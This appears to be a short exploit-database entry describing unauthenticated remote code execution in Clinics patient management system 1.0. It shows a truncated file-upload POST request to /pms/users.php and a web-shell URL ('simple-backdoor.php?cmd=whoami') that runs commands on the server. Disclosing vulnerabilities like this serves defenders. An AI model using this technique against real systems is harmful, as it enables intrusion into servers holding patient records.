Clinics patient management system 1.0 unauthenticated rce Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2024-02-05 |
Type : webapps |
Platform : php
This exploit / vulnerability Clinics patient management system 1.0 unauthenticated rce is for educational purposes only and if it is used you will do on your own risk!
## Unauthenticated users can access /pms/users.php address and they can upload malicious php file instead of profile picture image without any authentication.
POST /pms/users.php HTTP/1.1
Host: 192.168.1.36
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
## After the file upload request sent by attacker, Application adds a random number to the beginning of the file to be uploaded. Malicious file can be seen under the path /pms/users.php without any authentication.
## With the request http://192.168.1.36/pms/user_images/1696676940simple-backdoor.php?cmd=whoami the attacker can execute arbitrary command on the application server.
Clinics patient management system 1.0 unauthenticated rce